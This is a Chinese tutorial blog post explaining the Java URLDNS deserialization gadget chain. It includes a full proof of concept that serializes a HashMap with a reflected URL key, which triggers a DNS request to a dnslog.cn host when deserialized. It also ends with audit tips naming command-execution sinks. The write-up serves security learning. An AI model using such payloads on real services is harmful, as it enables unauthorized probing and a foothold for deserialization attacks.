2. 程式人生 > 其它 >URLDNS反序列化鏈

URLDNS反序列化鏈

阿新 發佈:2021-12-06

關於java的反序列化只是大概知道是因為readObject方法,導致的但是怎麼個過程導致的rce,還是很迷糊的。

但是直接從CC鏈來學習的話,對新手實在不太友好。所以,今天從ysoserial.jar中最簡單的URLDNSgadget來學習一下反序列化的流程。

此次利用的URL.class是jdk自帶的,無需依賴第三方。整條利用鏈相對簡單,適合新手練手

根據ysoserial類的poc,下面自行改編

先上圖為敬,如下效果圖

序列化類

反序列化類

執行反序列化類裡面的main方法,如下圖,可以看到dnslog已經接收到了請求

接下來開始分析這條鏈是怎麼走的

程式碼中最重要的三個類是HashMap,URL,URLStreamHandler。其中HashMap重寫了readObject方法,URL類是裡面有個hashCode()方法被HashMap的readObject()呼叫了,URLStreamHandler類是裡面的getHostAddress被URL類裡面的hashCode()方法呼叫了。這樣形成了一條呼叫鏈HashMap.readObject()--->HashMap.putVal()--->HashMap.hash()--->URL.hashCode()

繼續往下看,for迴圈裡面把map的key和value都反序列化了,最後進到了putVal方法裡面

我們跟進hash(key)方法,可以看到傳入了一個Object型別的key,如果key為空,返回0,不為空的話進入key.hashCode()方法

此時我們需要注意了,上圖中的hash方法傳入的是Object型別的,那麼如果我們傳入的是URL類呢?我們看下URL類有沒有hashCode()方法,如果有的話,則能繼續下一步,繼續根據key.hashCode()方法

上圖說hashCode != -1,則直接返回hashCode,而該URL類的hashCode值被預設定義成了-1。如果等於-1,則繼續往下走,我們繼續看hashCode(this)方法

此刻已經分析完了整條鏈的呼叫過程,接下來就是寫poc來實現了

package com.zyp.test;

import java.io.*;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.HashMap;

public class UrlDnsSerializeTest {
    public static void serialize(Object obj) throws Exception {
        ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("serialize.bin"));
        oos.writeObject(obj);
    }
    public static Object unSerialize(File file) throws Exception {
        ObjectInputStream ois=new ObjectInputStream(new FileInputStream(file));
        Object o = ois.readObject();
        return o;
    }

    public static void main(String[] args) throws Exception {
        HashMap<Object,Object> hashMap=new HashMap<>();
        URL url=new URL("http://serialize.zxz7y3.dnslog.cn");
        //為了下面的put方法不執行URL類裡面的getHostAddress方法,使用反射技術獲取URL類的屬性hashCode,並改變其原有值
        Class c=  url.getClass();
        //獲取使用屬性hashCode
        Field hashCode = c.getDeclaredField("hashCode");
        hashCode.setAccessible(true);
        //此處hashCode改為111,目的就是為了不進getHostAddress方法
        hashCode.set(url,111);
        hashMap.put(url,1);
        //hashMap執行完URL類的hashCode()後,通過反射,把URL類的hashCode值設定為-1,在反序列化時進入getHostAddress方法
        hashCode.set(url,-1);
        serialize(hashMap);
        File file=new File("serialize.bin");
        unSerialize(file);
    }

}

突然發現一個問題,HashMap的put方法也呼叫了putVal()

那我們進行序列化時,應該就會有dns請求,的確如果不做其他處理,在序列化時,就會有dns請求。所以看poc,在put之前就通過反射改變了hashCode的值。使其不等於-1,這樣就不會進入到getHostAddress方法

審計思路

需要滿足以下條件

1、如果是Java原生類,則需要入口類有readObject方法,同時實現了序列化介面

2、需要有最終的執行函式(可以執行程式碼或者命令),比如getRuntime.exec,getHostAddress.....等等,這些函 數需要自己平常去收集,這樣審計起來會更得心應手

相關推薦

URLDNS序列

關於java的序列只是大概知道是因為readObject方法,導致的但是怎麼個過程導致的rce,還是很迷糊的。

PHP序列挖掘

參考文章 最新出了 yii2 RCE的,但是最新版的已經被修復了,接下來自己嘗試看能不能自己找到其他

CommonsCollection4序列學習

CommonsCollection4 1、前置知識 由於cc4沒有新的知識點,主要是用cc2,然後稍微cc3結合了,所以我們可以看ysoserial原始碼,自己嘗試構造一下,把cc2通過獲取InvokeTransformer()獲取templatesImpl的newtransformer

CommonsCollection7序列學習

CommonsCollections7 1、前置知識 Hashtable Hashtable實現了Map介面和Serializable介面,因此,Hashtable現在整合到了集合框架中。它和HashMap類很相似,但是它支援同步,像HashMap一樣,Hashtable在雜湊表中儲存鍵/

C3P0序列學習

C3P0 c3p0第一次聽聞是用於fastjson的回顯上,大佬們總結三種方法,後面兩種主要就是用於fastjson和jackjson的回顯利用(注入記憶體馬)

PHP序列分析

前言 基本的魔術方法和序列漏洞原理這裡就不展開了。 給出一些魔術方法的觸發條件:

JAVA序列URLDNS分析

前言 從之前shiro、fastjson等序列漏洞剛曝出的時候,就接觸ysoserial的工具利用了,不過這麼久都沒好好去學習過其中的利用,這次先從其中的一個可以說是最簡單的利用URLDNS開始學起。

java序列-URLDNS

ysoserial ysoserial是一個可以生成序列payload的工具,它可以讓使用者根據自己選擇的利用,生成序列利用資料,通過將這些資料傳送給目標,從而執行使用者預先定義的命令,用法:

Java序列學習之URLDNS

最近初學Java審計,先從URLDNS入手來進行學習。 現在網上下載ysoserial,並使用IDEA開啟

CommonsCollections2 序列利用分析

在 ysoserial中 commons-collections2 是用的 PriorityQueue reaObject 作為序列的入口 那麼就來看一下 java.util.PriorityQueue.java 的 readObject方法

CommonsCollections3 序列利用分析

InstantiateTransformer commons-collections 3.1 中有 InstantiateTransformer 這麼一個類,這個類也實現了 Transformer的transform方法 ,如下:

CVE-2020-15148 Yii框架序列RCE利用 exp

簡介 如果在使用yii框架,並且在使用者可以控制的輸入處呼叫了unserialize()並允許特殊字元的情況下,會受到序列遠端命令命令執行漏洞攻擊。

Yii框架序列RCE利用分析

影響範圍 Yii2 < 2.0.38 測試版本 yii-basic-app-2.0.37.tgz 原理我這邊看了一下,是能夠看懂,但是我是菜雞,序列我構造不出來=。=

白說:php序列之pop

前言 最近的CTF比賽中,感覺PHP序列化反序列化漏洞中的POP的身影越越多了,特此,寫一篇關於POP構造的小文,內容不深,更多的是想提供給想要入坑的小夥伴們一點借鑑(厲害的大牛實在太多),所以,本文的自我定

Fastjson序列漏洞分析--JdbcRowSetImpl利用

這段時間在學習滲透測試的相關知識,看了一些關於 Fastjson 序列漏洞分析的部落格和視訊,這裡復現一下。

Fastjson序列漏洞分析--TemplatesImpl利用

前面對 TemplatesImpl 利用進行了漏洞分析,這次接著上次的內容,對 TemplatesImpl 利用進行分析。

Lab: Exploiting PHP deserialization with a pre-built gadget chain:利用預先構建的小工具利用 PHP 序列(PHPGGC的使用)

靶場內容 該實驗室具有使用簽名 cookie 的基於序列化的會話機制。它還使用通用的 PHP 框架。儘管您沒有原始碼訪問許可權,但您仍然可以使用預構建的小工具來利用此實驗室的不安全反序列化

Lab: Exploiting Ruby deserialization using a documented gadget chain:使用小工具利用 Ruby 序列(Ruby 2.x Universal RCE Gadget Chain指令碼使用)

靶場內容: 本實驗使用基於序列的會話機制和 Ruby on Rails 框架。有一個記錄的漏洞利用可以通過此框架中的小工具實現遠端程式碼執行。

php序列——pop實戰

php序列詳解參考:https://www.cnblogs.com/pursue-security/p/15291087.html php序列之魔法函式詳解:https://www.cnblogs.com/pursue-security/p/15291121.html

fastjson序列-JdbcRowSetImpl利用

fastjson序列-JdbcRowSetImpl利用 JdbcRowSetImpl利用 fastjson序列JdbcRowSetImpl - Afant1 - 部落格園 (cnblogs.com)